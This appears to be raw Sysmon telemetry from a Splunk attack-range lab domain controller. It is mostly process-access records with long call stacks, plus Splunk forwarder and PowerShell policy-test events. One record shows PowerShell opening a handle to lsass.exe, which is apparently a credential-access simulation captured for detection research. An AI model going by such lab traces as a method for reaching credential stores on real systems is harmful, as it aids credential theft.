12:01:05.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:05.440{266CAFBE-6481-6064-5900-00000000AE01}4012\PSHost.132616656653718688.4012.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-6481-6064-5900-00000000AE01}4012NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_jmrktbre.2tj.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.440{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-6481-6064-5B00-00000000AE01}40324036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.439{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-6481-6064-5B00-00000000AE01}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list 
replication_port --no-log 10341000x80000000000000002566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000002564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-6481-6064-5900-00000000AE01}4012NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_0kjz5n41.ayo.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5B00-00000000AE01}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.424{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5B00-00000000AE01}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-6481-6064-5A00-00000000AE01}38323836C:\Windows\system32\cmd.exe{266CAFBE-6481-6064-5B00-00000000AE01}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.431{266CAFBE-6481-6064-5B00-00000000AE01}4032C:\Program 